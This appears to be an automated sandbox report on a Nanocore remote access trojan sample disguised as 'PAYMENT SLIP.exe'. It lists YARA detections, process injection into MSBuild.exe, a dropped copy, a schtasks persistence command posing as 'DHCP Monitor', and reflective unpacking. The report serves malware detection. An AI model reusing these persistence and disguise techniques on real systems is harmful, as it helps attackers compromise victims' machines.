        Source: 12.2.MSBuild.exe.61a4629.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.61a4629.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.3545564.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.3545564.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.3545564.16.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.MSBuild.exe.17d0000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.17d0000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.1430000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.1430000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.3524cf0.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.3524cf0.18.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.MSBuild.exe.466a56f.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.466a56f.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.61a0000.33.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.61a0000.33.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.PAYMENT SLIP.exe.2400000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 1.2.PAYMENT SLIP.exe.2400000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 1.2.PAYMENT SLIP.exe.2400000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 19.2.MSBuild.exe.410310d.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.MSBuild.exe.410310d.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.46658d0.22.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.46658d0.22.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.17a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.17a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.1844c9f.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.1844c9f.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.hmhrpib.exe.2f30000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.hmhrpib.exe.2f30000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.hmhrpib.exe.2f30000.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 19.2.MSBuild.exe.30d3c74.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.MSBuild.exe.30d3c74.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 19.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 19.2.MSBuild.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 19.2.MSBuild.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 19.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 19.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: MSBuild.exe, 00000011.00000002.714864522.0000000002E71000.00000004.00000001.sdmpBinary or memory string: *.sln
        Source: classification engineClassification label: mal100.troj.evad.winEXE@26/31@17/1
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 1_2_004035D8 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_004035D8
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeCode function: 8_2_004035D8 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,8_2_004035D8
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_057D12EA AdjustTokenPrivileges,12_2_057D12EA
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_057D12B3 AdjustTokenPrivileges,12_2_057D12B3
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 1_2_00404983 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_00404983
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 1_2_004021A2 CoCreateInstance,1_2_004021A2
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeFile created: C:\Users\user\AppData\Roaming\tteegmiuoefsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{c473d7c4-8173-4cff-8fb5-dfc81a12600f}
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6876:120:WilError_01
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6608:120:WilError_01
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeFile created: C:\Users\user\AppData\Local\Temp\nsmD248.tmpJump to behavior
        Source: PAYMENT SLIP.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeFile read: C:\Users\user\Desktop\PAYMENT SLIP.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\PAYMENT SLIP.exe 'C:\Users\user\Desktop\PAYMENT SLIP.exe'
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 'C:\Users\user\Desktop\PAYMENT SLIP.exe'
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeProcess created: C:\Users\user\Desktop\PAYMENT SLIP.exe 'C:\Users\user\Desktop\PAYMENT SLIP.exe'
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 'C:\Users\user\Desktop\PAYMENT SLIP.exe'
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe 'C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe'
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeProcess created: C:\Users\user\Desktop\PAYMENT SLIP.exe 'C:\Users\user\Desktop\PAYMENT SLIP.exe'
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 'C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe'
        Source: unknownProcess created: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe 'C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe'
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp3E70.tmp'
        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 'C:\Users\user\Desktop\PAYMENT SLIP.exe'
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 0
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 'C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe'
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeProcess created: C:\Users\user\Desktop\PAYMENT SLIP.exe 'C:\Users\user\Desktop\PAYMENT SLIP.exe'
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 'C:\Users\user\Desktop\PAYMENT SLIP.exe'
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 'C:\Users\user\Desktop\PAYMENT SLIP.exe' Jump to behavior
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeProcess created: C:\Users\user\Desktop\PAYMENT SLIP.exe 'C:\Users\user\Desktop\PAYMENT SLIP.exe' Jump to behavior
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 'C:\Users\user\Desktop\PAYMENT SLIP.exe' Jump to behavior
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeProcess created: C:\Users\user\Desktop\PAYMENT SLIP.exe 'C:\Users\user\Desktop\PAYMENT SLIP.exe' Jump to behavior
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 'C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe' Jump to behavior
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 'C:\Users\user\Desktop\PAYMENT SLIP.exe' Jump to behavior
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeProcess created: C:\Users\user\Desktop\PAYMENT SLIP.exe 'C:\Users\user\Desktop\PAYMENT SLIP.exe' Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp3E70.tmp'Jump to behavior
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 'C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe' Jump to behavior
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 'C:\Users\user\Desktop\PAYMENT SLIP.exe' Jump to behavior
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
        Source: PAYMENT SLIP.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: C:\Windows\System.pdboo source: MSBuild.exe, 0000000C.00000002.910679793.0000000003156000.00000004.00000040.sdmp
        Source: Binary string: indows\symbols\dll\System.pdb source: MSBuild.exe, 0000000C.00000002.910679793.0000000003156000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\dll\System.pdb source: MSBuild.exe, 0000000C.00000002.910679793.0000000003156000.00000004.00000040.sdmp
        Source: Binary string: wntdll.pdbUGP source: PAYMENT SLIP.exe, 00000001.00000003.657311903.0000000003210000.00000004.00000001.sdmp, PAYMENT SLIP.exe, 00000006.00000003.682894509.00000000031A0000.00000004.00000001.sdmp, hmhrpib.exe, 00000008.00000003.698726945.0000000002FB0000.00000004.00000001.sdmp, PAYMENT SLIP.exe, 0000000A.00000003.710544371.00000000032C0000.00000004.00000001.sdmp, hmhrpib.exe, 0000000D.00000003.715127820.0000000002F70000.00000004.00000001.sdmp, PAYMENT SLIP.exe, 00000014.00000003.735577807.0000000003090000.00000004.00000001.sdmp
        Source: Binary string: \??\C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb* source: MSBuild.exe, 0000000C.00000003.887823042.0000000001658000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: MSBuild.exe, 0000000C.00000002.910378079.00000000017A0000.00000004.00000001.sdmp
        Source: Binary string: wntdll.pdb source: PAYMENT SLIP.exe, 00000001.00000003.657311903.0000000003210000.00000004.00000001.sdmp, PAYMENT SLIP.exe, 00000006.00000003.682894509.00000000031A0000.00000004.00000001.sdmp, hmhrpib.exe, 00000008.00000003.698726945.0000000002FB0000.00000004.00000001.sdmp, PAYMENT SLIP.exe, 0000000A.00000003.710544371.00000000032C0000.00000004.00000001.sdmp, hmhrpib.exe, 0000000D.00000003.715127820.0000000002F70000.00000004.00000001.sdmp, PAYMENT SLIP.exe, 00000014.00000003.735577807.0000000003090000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: MSBuild.exe, 0000000C.00000002.911646592.000000000485A000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: MSBuild.exe, 0000000C.00000002.910984817.00000000034F4000.00000004.00000001.sdmp
        Source: Binary string: indows\System.pdbpdbtem.pdb source: MSBuild.exe, 0000000C.00000002.910679793.0000000003156000.00000004.00000040.sdmp
        Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: MSBuild.exe, 0000000C.00000002.910984817.00000000034F4000.00000004.00000001.sdmp
        Source: Binary string: System.pdbX source: MSBuild.exe, 0000000C.00000002.910679793.0000000003156000.00000004.00000040.sdmp
        Source: Binary string: System.pdb source: MSBuild.exe, 0000000C.00000002.910679793.0000000003156000.00000004.00000040.sdmp
        Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: MSBuild.exe, 0000000C.00000002.910984817.00000000034F4000.00000004.00000001.sdmp
        Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: MSBuild.exe, 0000000C.00000002.910679793.0000000003156000.00000004.00000040.sdmp
        Source: Binary string: mscorrc.pdb source: MSBuild.exe, 0000000C.00000002.913261020.0000000005DA0000.00000002.00000001.sdmp
        Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: MSBuild.exe, 0000000C.00000002.910417181.00000000017D0000.00000004.00000001.sdmp

        Data Obfuscation:

        barindex
        .NET source code contains potential unpackerShow sources
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
